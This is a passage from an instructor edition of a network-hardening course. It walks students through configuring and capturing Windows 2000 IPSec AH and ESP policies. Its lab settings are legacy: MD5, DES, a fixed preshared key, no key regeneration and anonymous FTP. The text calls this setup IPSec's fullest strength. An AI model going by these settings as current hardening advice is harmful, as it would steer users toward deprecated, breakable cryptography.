3. Observe that, because the policy on Student_Q says to request IPSeccommunication, Student_Q begins the negotiation process (in frame 4)by using the ISAKMP protocol (UDP port 500).

4. Observe that, when Student_P agrees to comply with the IPSec request(in frame 5), there is an ISAKMP interplay between the two machinesfor the next few frames to negotiate and establish the IPSec protocol.

5. Observe that the actual three-way handshake is now completed inframes 14 and 15.

6. Observe that, from frame 16 onward until the session teardown, the AHensures integrity of communication between the two machines.

Lesson 2: Implementing IPSec 103

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 157: SCNP Hardening

7. Double-click a frame whose protocol is identified by Network Monitor asFTP.

8. Observe the sequence of protocol identification: Ethernet, then IP, thenAH, then TCP, then FTP. As noted earlier:

• Ethernet identifies the protocol IP with an Ethertype of 0x800.

• IP identifies AH with a protocol ID of 0x33 (51).

• AH identifies TCP with a Next Header of 0x6 (6).

• TCP identifies FTP with a destination port of 0x15 (21).

9. Observe that there is no encryption—the AH only signs the packet; it doesnot encrypt it.

10. In fact, look around frame 33. Near there, you should be able to see thename of the text file in response to the dir (LIST) command.

11. Close Network Monitor. You can save your capture to a file if you like.

Implementing a Require IPSec PolicyNow let’s modify the situation a bit. You will configure Student_Q to demandIPSec of other computers. You will use the Require policy instead of the Requestpolicy. From Student_P, you will attempt to communicate with Student_Q andfail. Then you will reassign the Respond policy on Student_P so that you will beable to re-establish communications with Student_Q.

TASK 2C-11Implementing the 2_REQUIRE_AH(md5)_only Policy

Note:Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy, and choose Un-assign. Then close the ipsec.mmc.msc console.

Note: Perform the rest of this task only if you are designated as Student_Q.

2. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_AH(md5)_only policy, and choose Un-assign.

3. In the right pane, right-click and choose Create IP Security Policy, thenclick Next.

4. For the IP Security Policy Name, enter 2_REQUIRE_AH(md5)_only, andclick Next.

5. Uncheck Activate The Default Response Rule, and click Next.

6. Uncheck Edit Properties, and click Finish.

104 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 158: SCNP Hardening

7. Double-click the new policy.

8. On the Rules tab, uncheck Use Add Wizard if it’s checked, and clickAdd.

9. On the IP Filter List tab, click the radio button for All IP Traffic.

10. Switch to the Filter Action tab.

11. Click the radio button for Require Security.

12. Click the Edit button.

13. Leave the radio button selected for Negotiate Security.

14. Remove all but one method by holding down the Shift key, selecting allbut one of the choices, and clicking Remove.

15. When prompted with Are You Sure?, click Yes.

16. Select the remaining method, and click Edit.

17. Under Security Method, click the Settings button found under Custom(For Expert Users).

18. Verify that AH is checked and that the integrity algorithm is MD5.

19. Verify that ESP is unchecked.

20. Under the Session Key settings, uncheck the two boxes for generating newkeys for time and size.

21. Click OK. If you see an information box indicating that you are on aMedium security level, click OK to agree to it.

22. Click OK twice.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

26. Click OK to close the Edit Authentication Method Properties dialog box.

27. Click Close twice to close the Rule Properties.

Mismatched AH ImplementationYou have configured a policy where Student_Q will require other computers thatattempt to communicate with it to implement AH by using the MD5 algorithm;Student_Q also will respond only by using this algorithm. Let’s see what happenswhen Student_P does not follow Student_Q’s lead.

Lesson 2: Implementing IPSec 105

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 159: SCNP Hardening

TASK 2C-12Attempting to Use Different IPSec Policies

Note:Perform step 1 through step 3 only if you are designated as Student_Q.

1. In your ipsec.mmc.msc console, right-click the 2_REQUIRE_AH(md5)_only policy and choose Assign.

2. Activate Network Monitor, and make sure that it is going to collectpackets from the interface connected to Student_P. This is the Partnerinterface.

3. Allow Network Monitor to capture packets until Student_P has finishedthe rest of the task.

Note: Perform the rest of this task only if you are designated as Student_P.

4. At a command prompt, again enter ftp IP_address_of_Student_Q.

5. After a substantial delay, observe that you cannot ftp to Student_Q. Infact, you should receive a message indicating that the connection has timedout.

6. Enter quit to stop the ftp attempt.

Mismatched IPSec Session AnalysisWhy was your attempt unsuccessful? What is the reason for the substantial delay?This is because Student_Q’s policy is designed to demand IPSec. If a remotemachine trying to communicate with Student_Q is not IPSec-aware or does nothave a policy assigned to do so, then Student_Q will not fall back to regular,insecure IP. The substantial delay occurred because Student_Q was trying toestablish an IPSec communication with Student_P.

TASK 2C-13Analyzing a Mismatched IPSec Policy Session

Note:Perform this task only if you are designated as Student_Q. Student_P isadvised to follow along.

1. In Network Monitor, stop and view the capture.

2. Observe that, after the ARP resolution has taken place (in frames 1 and2), Student_P attempts to initiate a three-way handshake withStudent_Q (in frame 3).

106 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 160: SCNP Hardening

3. Observe that, because the policy on Student_Q says to require IPSeccommunication, Student_Q begins the negotiation process (in frame 4)with the ISAKMP protocol. When it does not hear from Student_P,approximately a second later, it tries again. Student_P, meanwhile, keepsknocking on Student_Q’s door with a SYN packet, as it has no idea howto respond to the ISAKMP exchange. Student_Q keeps plugging awaywith ISAKMP because its policy will allow it to proceed only afterISAKMP negotiations have been successful.

4. Close Network Monitor. You can save your capture to a file if you like.

Implementing and Analyzing the Require ResponsePolicyClearly, in order for Student_P to communicate, it must use an appropriate IPSecpolicy. Now, you will configure Student_P to respond to Student_Q’s IPSecpolicy. Once you have enabled the policy, you will capture and analyze the IPSectraffic in Network Monitor.

TASK 2C-14Implementing and Analyzing a Require IPSec PolicySession

Note:Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy and choose Assign. Then close the ipsec.mmc.mscconsole.

Note: Perform the following step only if you are designated as Student_Q.

2. Start Network Monitor, and start a capture as soon as Student_P enablesthe IPSec policy, but before Student_P attempts to ftp.

Note: Perform step 3 through step 6 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q.

4. Log on as anonymous with no password. You should be able to success-fully ftp to Student_Q.

5. Enter dir to see a list of files hosted on the ftp site.

6. Exit the ftp session, and close the command prompt.

Note: Perform the rest of this task only if you are designated as Student_Q.

7. In Network Monitor, stop and view the capture.

Lesson 2: Implementing IPSec 107

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 161: SCNP Hardening

8. Observe that these captures are exactly the same as when the1_REQUEST_AH(md5)_only policy was in force earlier in this topic.There is no difference with respect to the negotiation process, there is nodifference with respect to the three-way handshake, and so forth.

9. Close Network Monitor. You can save your capture to a file if you like.

Topic 2DIPSec ESP ImplementationIn the previous topic, you examined the AH implementation in Windows 2000.You implemented the different types of AH, and analyzed the communication inNetwork Monitor. In this topic, you will see how to configure a computer to usethe encryption provided with ESP, and compare the implementation options ofthis form of IPSec to the AH implementations.

Implementing a Request ESP IPSec PolicyLet’s start our investigation of ESP encryption by creating a Request policy. Thetools and the basic procedure are the same as you used to implement AH Requestpolicies, just some of the options you select will be slightly different.

TASK 2D-1Creating the 3_REQUEST_ESP(des)_only IPSec Policy

Note:Perform this task only if you are designated as Student_Q. Student_P isadvised to follow along.

1. If necessary, open your ipsec.mmc.msc console. In the right pane, right-click and choose Create IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 3_REQUEST_ESP(des)_only, andclick Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, and clickAdd.

7. On the IP Filter List tab, click the radio button for All IP Traffic.

8. Switch to the Filter Action tab.

9. Click the radio button for Request Security (Optional).

108 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 162: SCNP Hardening

10. Click Edit.

11. Leave the radio button selected for Negotiate Security.

12. Read the options presented to you under Security Method PreferenceOrder.

13. Remove all but one security method by holding the Shift key, selectingall but one of the choices, and clicking Remove. There might be only oneoption in some cases, based on your current OS configuration. If so, skip thenext step.

14. When prompted with Are You Sure?, click Yes.

15. Select the remaining method, and click Edit.

16. Under Security Method, click the Settings button found under Custom(For Expert Users).

17. Verify that AH is unchecked.

18. Verify that ESP is checked.

19. Leave ESP’s integrity algorithm set to <None>.

20. For Encryption Algorithm, select DES.

21. Under the Session Key settings, verify that the boxes for generating newkeys for both time and size are unchecked.

22. Click OK three times to return to the New Rule Properties.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

26. Click OK, and then click Close to return to the Policy Properties.

27. On the Rules tab, check <Dynamic> Default Response, and verify thatthe Use Add Wizard check box is unchecked. Click Edit.

28. Under Security Methods, remove all but one of the methods.

29. When prompted with Are You Sure?, click Yes.

30. Select the remaining method, and click Edit.

31. Under Security Method, click the Settings button found under Custom(For Expert Users).

32. Verify that AH is unchecked.

33. Verify that ESP is checked.

Lesson 2: Implementing IPSec 109

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 163: SCNP Hardening

34. Verify that ESP’s integrity algorithm is set to <None>.

35. For ESP’s encryption, select DES.

36. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

37. Click OK twice to return to the Rule Properties.

38. Switch to the Authentication Methods tab.

39. Click Edit.

40. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

41. Click OK twice, and then click Close to exit from the Policy Properties.

42. Close the ipsec.mmc.msc, without saving settings.

Configuring the ESP IPSec ResponseYou have configured a policy wherein Student_Q will request other computersthat attempt to communicate with it to implement ESP by using the DES encryp-tion algorithm; Student_Q is also in a position to respond by using this algorithm.If communication were attempted at this point, the two hosts would not be ableto send data to one another. The second host, Student_P in this case, must beconfigured to communicate using ESP as well.

During the creation of this policy, you will see five columns presented as SecurityMethods: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Life-times (KB/Sec). Because you will have named this policy 3_RESPOND_ESP(des)_only, you’ll simplify the list and offer exactly one choice, as you did inthe other rules. In this case, you are creating a rule so that the host will respondto requests for IP Security that rely only on ESP confidentiality by using the DESencryption algorithm.

TASK 2D-2Creating the 3_RESPOND_ESP(des)_only IPSec Policy

Note:Perform this task only if you are designated as Student_P. Student_Q isadvised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the1_RESPOND_AH(md5)_only policy. Create another IP Security Policy.Click Next.

2. For the IP Security Policy Name, enter 3_RESPOND_ESP(des)_only, andclick Next.

3. Uncheck Activate The Default Response Rule, and click Next.

110 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 164: SCNP Hardening

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, check<Dynamic> Default Response, and click Edit.

7. Remove all but one Security Method by holding the Shift key, selectingall but one of the choices, and clicking Remove.

8. When prompted with Are You Sure?, click Yes.

9. Select the remaining method, and click Edit.

10. Under Security Method, click the Settings button found under Custom(For Expert Users).

11. Verify that AH is unchecked.

12. Verify that ESP is checked.

13. Verify that ESP’s integrity algorithm is set to <None>.

14. For Encryption Algorithm, select DES.

15. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

16. Click OK twice to return to the Rule Properties.

17. Switch to the Authentication Methods tab.

18. Click Edit.

19. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

20. Click OK twice, and then click Close to end the creation of the policy.

21. Close the ipsec.mmc.msc without saving settings.

ESP Request-and-Response Session AnalysisNow that you have two hosts each configured with an ESP IPSec policy, you willenable those policies. You will then initiate network traffic, and analyze the trafficin Network Monitor. During the analysis stage, keep in mind the differences yousee between the ESP implementation and what you saw in the AHimplementation.

Lesson 2: Implementing IPSec 111

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 165: SCNP Hardening

The first task will walk through the steps of using IPSec with ESP on one host,and not the other. As with the 1_REQUEST_AH(md5)_only policy, this transac-tion is also successful between Student_P and Student_Q because Student_Q’spolicy is designed to request only—not demand—IPSec. If a remote machine try-ing to communicate with Student_Q is not IPSec-aware or does not have a policyassigned to do so, then Student_Q will fall back to regular, insecure IP. As yousaw before, the brief delay occurs because Student_Q is trying to establish anIPSec communication with Student_P.

TASK 2D-3Enabling IPSec ESP Policies

Note:Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ESP(des)_only policy and choose Assign. Assigning this policyautomatically unassigns the policy that was in effect.

2. Start Network Monitor, make sure that it is going to collect packetsfrom the interface connected to Student_P, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. At a command prompt, again enter ftp IP_address_of_Student_Q.

4. Observe that you can successfully ftp to Student_Q after a very briefdelay, even though an IPSec policy is assigned on Student_Q.

5. Log on as anonymous with no password.

6. Enter dir to see a list of files hosted on the ftp site.

7. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.

9. Observe that, after the ARP resolution has taken place (in frames 1 and2), Student_P attempts to initiate a three-way handshake withStudent_Q (in frame 3). Because the policy on Student_Q says to requestIPSec communication, Student_Q begins the negotiation process (in frame4).

10. Observe that in frame 4, the protocol is ISAKMP (UDP port 500). Whenit does not hear from Student_P, it tries again approximately a second later.When it does not hear from Student_P again, it falls back to insecure com-munication, and the three-way handshake proceeds as before (in frames 6, 7,and 8).

11. Close Network Monitor. You can save your capture to a file if you like.

112 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 166: SCNP Hardening

Implementing an ESP IPSec SessionAs you saw, with the mismatched IPSec policies as defined, there still is somecommunication; however it is not secure communication. In the next task, youwill enable IPSec on both ends and initiate communication. Then, you will exam-ine the network traffic in Network Monitor to see if, indeed, it is encrypted.

TASK 2D-4Configuring and Analyzing an ESP IPSec Session

Note:Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 5 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q.

4. Log on as anonymous with no password.

5. Enter dir to see a list of files hosted on the ftp site, and exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

6. In Network Monitor, stop and view the capture.

7. Observe that, after the ARP resolution has taken place (in frames 1 and2), Student_P attempts to initiate a three-way handshake withStudent_Q (in frame 3).

8. Observe that, because the policy on Student_Q says to request IPSeccommunication, Student_Q begins the negotiation process (in frame 4)using the ISAKMP protocol (UDP port 500).

9. Observe that, when Student_P agrees to comply (in frame 5), there is anISAKMP interplay between the two machines for the next few frames tonegotiate and establish the IPSec protocol.

10. Observe that the actual three-way handshake is now completed inframes 14 and 15.

11. Close Network Monitor. You can save your capture to a file if you like.

Lesson 2: Implementing IPSec 113

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 167: SCNP Hardening

ESP AnalysisIn the last task, you looked at the three-way handshake in frames 14 and 15. Areyou sure you were looking at the three-way handshake? What do you see herethat’s different from the earlier capture (the one resulting from the AH_onlypolicy)? You cannot see any of the TCP flags, connection setup, three-way hand-shake completion, or data transfer—in fact, nothing but encrypted stuff shows up!The protocol is listed simply as ESP. Nobody but these two endpoints can decryptpackets destined for them. Try to look for the name of the text file in response tothe dir (LIST) command.

From frames 14 onward until the session teardown, ESP ensures the confidential-ity of communication between the two machines; however, you have no way ofknowing anything about the integrity of the packet, apart from those checks andbalances built into TCP/IP. You never chose either the AH protocol nor the integ-rity algorithm of ESP. You chose only ESP for encryption.

Creating a Require ESP IPSec PolicyAgain, let’s modify the situation a bit. We’ll configure Student_Q to demandIPSec of other computers. We’ll use the Require policy instead of the Requestpolicy. From Student_P, we’ll attempt to communicate with Student_Q and fail.We’ll then reassign the Respond policy on Student_P and re-establish communi-cations with Student_Q.

TASK 2D-5Implementing the 4_REQUIRE_ESP(des)_only IPSecPolicy

Note:Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy, and choose Un-assign.

Note: Perform the rest of this task only if you are designated as Student_Q.Student_P is advised to follow along.

2. Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ESP(des)_only policy, and choose Un-assign.

3. Create another IP Security Policy. Click Next.

4. For the IP Security Policy Name, enter 4_REQUIRE_ESP(des)_only, andclick Next.

5. Uncheck Activate The Default Response Rule, and click Next.

6. Uncheck Edit Properties, and click Finish.

7. Double-click the new policy.

114 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 168: SCNP Hardening

8. On the Rules tab, verify that Use Add Wizard is unchecked, and clickAdd.

9. On the IP Filter List tab, click the radio button for All IP Traffic.

10. Switch to the Filter Action tab.

11. Click the radio button for Require Security.

12. Click Edit.

13. Leave the radio button for Negotiate Security selected.

14. Remove all but one method by holding the Shift key, selecting all butone of the choices, and clicking Remove. Some configurations may haveonly one option. If so, skip the next step.

15. When prompted with Are You Sure?, click Yes.

16. Select the remaining method, and click Edit.

17. Under Security Method, select Custom. Click the Settings button foundunder Custom (For Expert Users), and make sure that AH is unchecked.

18. Verify that ESP is checked.

19. Leave ESP’s integrity algorithm set to <None>.

20. For Encryption Algorithm, select DES.

21. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

22. Click OK three times to return to the Rule Properties.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

26. Click OK, and click Close twice to end the policy modification.

Configuring a Require ESP IPSec SessionYou have configured a policy where Student_Q will require other computers thatattempt to communicate with it to implement AH by using the MD5 algorithm;Student_Q also will only respond using this algorithm.

The following task covers several situations. First, there will be a mismatchbetween the two hosts, as Student_P and Q are using different forms of IPSec.Then, both hosts will use the same implementation, and the session will be ana-lyzed in Network Monitor.

Lesson 2: Implementing IPSec 115

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 169: SCNP Hardening

The mismatch part will not be successful because Student_Q’s policy is designedto demand IPSec. If a remote machine trying to communicate with Student_Q isnot IPSec-aware or does not have a policy assigned to do so, then Student_Q willnot fall back to regular, insecure IP. As you saw before, a substantial delay willoccur because Student_Q is trying to establish an IPSec communication withStudent_P.

Finally, once ESP is used on both ends of the communication, you will see thatthere is no difference with respect to the negotiation process—there is no differ-ence with respect to the encryption of all subsequent information, and so forth.

Once ISAKMP establishes the encryption algorithms between the two machines,as far as an eavesdropper is concerned, there will be nothing but binary garbagebeyond the IP header.

TASK 2D-6Require-and-Respond ESP Implementation andAnalysis

Note:Perform the following step only if you are designated as Student_Q.

1. In your ipsec.mmc.msc console, right-click the 4_REQUIRE_ESP(des)_only policy, and choose Assign. Close the console.

Note: Perform step 2 through step 5 only if you are designated as Student_P.

2. At the command prompt, again enter ftp IP_address_of_Student_Q.

3. After a substantial delay, observe that you cannot ftp to Student_Q. Infact, you should receive a message indicating that the connection has timedout.

4. Enter quit to stop the ftp attempt.

5. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy, and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

6. Start Network Monitor, and start a capture.

Note: Perform step 7 through step 10 only if you are designated asStudent_P.

7. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q.

8. Log on as anonymous with no password.

9. Enter dir to see a list of files hosted on the ftp site.

10. Exit the ftp session.

116 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 170: SCNP Hardening

Note: Perform step 11 through step 12 only if you are designated asStudent_Q.

11. In Network Monitor, stop and view the capture.

12. Observe that these captures are exactly the same as when the3_REQUEST_ESP(des)_only and the 3_RESPOND_ESP(des)_only poli-cies were in force earlier.

Close Network Monitor, saving the capture if you like.

Topic 2ECombining AH and ESP in IPSecYou have configured and analyzed IPSec traffic by using AH, and IPSec traffic byusing ESP. In this topic, you will configure and analyze network traffic that com-bines AH and ESP. When you are using both AH and ESP, you are configuringIPSec to its fullest strength.

TASK 2E-1Creating the 5_REQUEST_AH(md5)+ESP(des) IPSecPolicy and the Response Policy

Note:Perform this task only if you are designated as Student_Q. Student_P isadvised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the4_REQUIRE_ESP(des)_only policy, and then create another IP SecurityPolicy. Click Next.

2. For the IP Security Policy Name, enter 5_REQUEST_AH(md5)+ESP(des),and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, and clickAdd.

7. On the IP Filter List tab, click the radio button for All IP Traffic.

8. Switch to the Filter Action tab.

9. Click the radio button for Request Security (Optional).

10. Click Edit.

Lesson 2: Implementing IPSec 117

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 171: SCNP Hardening

11. Leave the radio button selected for Negotiate Security.

12. Read the options presented to you under Security Method PreferenceOrder.

13. Remove all but one method by holding the Shift key, selecting all butone of the choices, and clicking Remove. Some configurations might haveonly one option. If so, skip the next step.

14. When prompted with Are You Sure?, click Yes.

15. Select the remaining method, and click Edit.

16. Under Security Method, click the Settings button found under Custom(For Expert Users).

17. Verify that AH is checked.

18. Select the integrity algorithm MD5.

19. Verify that ESP is checked.

20. Leave ESP’s integrity algorithm set to <None>.

21. For Encryption Algorithm, select DES.

22. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

23. Click OK three times to return to the Rule Properties.

24. Switch to the Authentication Methods tab.

25. Click Edit.

26. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

27. Click OK, and then click Close to return to the Policy Properties.

28. On the Rules tab, check <Dynamic> Default Response, and click Edit.The Use Add Wizard check box should remain unchecked.

29. Under Security Methods, hold the Shift key, select all but one of thechoices, and click Remove.

30. Select the remaining method, and click Edit.

31. Under Security Method, click the Settings button found under Custom(For Expert Users).

32. Verify that AH is checked.

33. Select the integrity algorithm MD5.

34. Verify that ESP is checked.

118 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 172: SCNP Hardening

35. Leave ESP’s integrity algorithm set to <None>.

36. For Encryption Algorithm, select DES.

37. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

38. Click OK twice to return to the Rule Properties.

39. Switch to the Authentication Methods tab.

40. Click Edit.

41. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

42. Click OK twice, and then click Close to exit the Policy Properties.

43. Close the console without saving settings.

Configuring the IPSec ResponseYou have configured a policy where Student_Q will request other computers thatattempt to communicate with it to implement AH by using the MD5 integrityalgorithm and ESP by using the DES encryption algorithm; Student_Q is also ina position to respond by using this algorithm. Let’s configure Student_P to followStudent_Q’s lead.

TASK 2E-2Creating the 5_RESPOND_AH(md5)+ESP(des) IPSecPolicy

Note:Perform this task only if you are designated as Student_P. Student_Q isadvised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the3_RESPOND_ESP(des)_only policy, then create another IP SecurityPolicy. Click Next.

2. For the IP Security Policy Name, enter 5_RESPOND_AH(md5)+ESP(des),and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, check<Dynamic> Default Response, and click Edit.

Lesson 2: Implementing IPSec 119

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 173: SCNP Hardening

7. Remove all but one security method by holding the Shift key, selectingall but one of the choices, and clicking Remove.

8. When prompted with Are You Sure?, click Yes.

9. Select the remaining method, and click Edit.

10. Under Security Method, click the Settings button found under Custom(For Expert Users).

11. Verify that AH is checked.

12. Select the integrity algorithm MD5.

13. Verify that ESP is checked.

14. Leave ESP’s integrity algorithm set to <None>.

15. For Encryption Algorithm, select DES.

16. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

17. Click OK twice to return to the Rule Properties.

18. Switch to the Authentication Methods tab.

19. Click Edit.

20. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

21. Click OK twice, and then click Close to close the Policy Properties.

22. Close the console without saving settings.

AH and ESP IPSec Session AnalysisYou have just gone through the steps of configuring IPSec on both Student_P andStudent_Q. In the next task, you will initiate a communication between the twohosts, and analyze the communication in Network Monitor.

The initial communication will be an attempt at using FTP. As with the1_REQUEST_AH(md5)_only and 3_REQUEST_ESP(des)_only policies, thistransaction is also successful between Student_P and Student_Q because Student_Q’s policy is designed to request—not demand—IPSec. If a remote machinetrying to communicate with Student_Q is not IPSec-aware or does not have apolicy assigned to do so, then Student_Q will fall back to regular, insecure IP.The brief delay occurs because Student_Q is trying to establish an IPSec commu-nication with Student_P. Once the connection is made, the second computer willbe configured to respond to the first properly.

120 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 174: SCNP Hardening

During the session analysis, try to note the differences from the earlier captures—those resulting from the AH_only and ESP_only policies. Here, you are not ableto see any of the TCP flags, connection setup, three-way handshake completion,or data transfer—in fact, you will see nothing but encrypted stuff! The protocol islisted simply as ESP. If you check the details within the IP header, IP points toAH—IP protocol ID 51 (0x33) and AH points to ESP—IP protocol ID 50 (0x32).After the IP header is AH/ESP. Nobody but these two endpoints can decryptpackets destined for them.

TASK 2E-3Configuring and Analyzing an IPSec Session Using AHand ESP

Note:Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 5_REQUEST_AH(md5)+ESP(des) policy and choose Assign. Close the console.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q after a very brief delay, eventhough an IPSec policy is assigned on Student_Q.

4. Log on as anonymous with no password.

5. Enter dir to see a list of files hosted on the ftp site.

6. Exit the ftp session.

7. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy, and choose Assign.

Note: Perform step 8 through step 10 only if you are designated asStudent_Q.

8. In Network Monitor, stop and view the capture.

9. Observe the session between the two hosts.

10. Start a new capture (save the previous capture if you like).

Note: Perform step 11 through step 14 on Student_P.

11. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q.

12. Log on as anonymous with no password.

Lesson 2: Implementing IPSec 121

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 175: SCNP Hardening

13. Enter dir to see a list of files hosted on the ftp site.

14. Exit the ftp session.

Note: Perform step 15 through step 22 only if you are designated asStudent_Q.

15. In Network Monitor, stop and view the capture.

16. Observe that, after the ARP resolution has taken place (in frames 1 and2), Student_P attempts to initiate a three-way handshake withStudent_Q (in frame 3).

17. Observe that, when the policy on Student_Q says to request IPSec com-munication, Student_Q begins the negotiation process (in frame 4) byusing the ISAKMP protocol (UDP port 500).

18. Observe that, when Student_P agrees to comply (in frame 5), there is anISAKMP interplay between the two machines for the next few frames tonegotiate and establish the IPSec protocol.

19. Observe that the actual three-way handshake is now completed inframes 14 and 15.

20. Search the packets, and try to look for the name of the text file inresponse to the dir (LIST) command.

21. Observe that, from frames 14 onward until the session teardown, AHensures integrity and ESP ensures confidentiality of communicationbetween the two machines.

22. Close Network Monitor. You can save your capture to a file if you like.

Note: Perform the following step only if you are designated as Student_P.

23. Open your ipsec.mmc.msc console, unassign the 5_RESPOND_AH(md5)+ESP(des) policy, and close the console.

Requiring AH and ESP in an IPSec SessionAgain, let’s modify the situation a bit. You’ll configure Student_Q to demandIPSec of other computers by using the Require policy instead of the Requestpolicy. From Student_P, you’ll attempt to communicate with Student_Q and fail.You’ll then reassign the Respond policy on Student_P, so that you are able toestablish communications with Student_Q.

122 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 176: SCNP Hardening

TASK 2E-4Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSecPolicy

Note:Perform this task only if you are designated as Student_Q. Student_P isadvised to follow along.

1. Open your ipsec.mmc.msc console, and unassign the 5_REQUEST_AH(md5)+ESP(des) policy.

2. Create another IP Security Policy. Click Next.

3. For the IP Security Policy Name, enter 6_REQUIRE_AH(md5)+ESP(des),and click Next.

4. Uncheck Activate The Default Response Rule, and click Next.

5. Uncheck Edit Properties, and click Finish.

6. Double-click the new policy.

7. On the Rules tab, verify that Use Add Wizard is unchecked, and clickAdd.

8. On the IP Filter List tab, click the radio button for All IP Traffic.

9. Switch to the Filter Action tab.

10. Click the radio button for Require Security.

11. Click Edit.

12. Leave the radio button selected for Negotiate Security.

13. If necessary, remove all but one security method.

14. Select the remaining method, and click Edit.

15. Under Security Method, click the Settings button found under Custom(For Expert Users).

16. Verify that AH is checked and that the integrity algorithm is set toMD5.

17. Verify that ESP is checked.

18. Leave ESP’s integrity algorithm set to <None>.

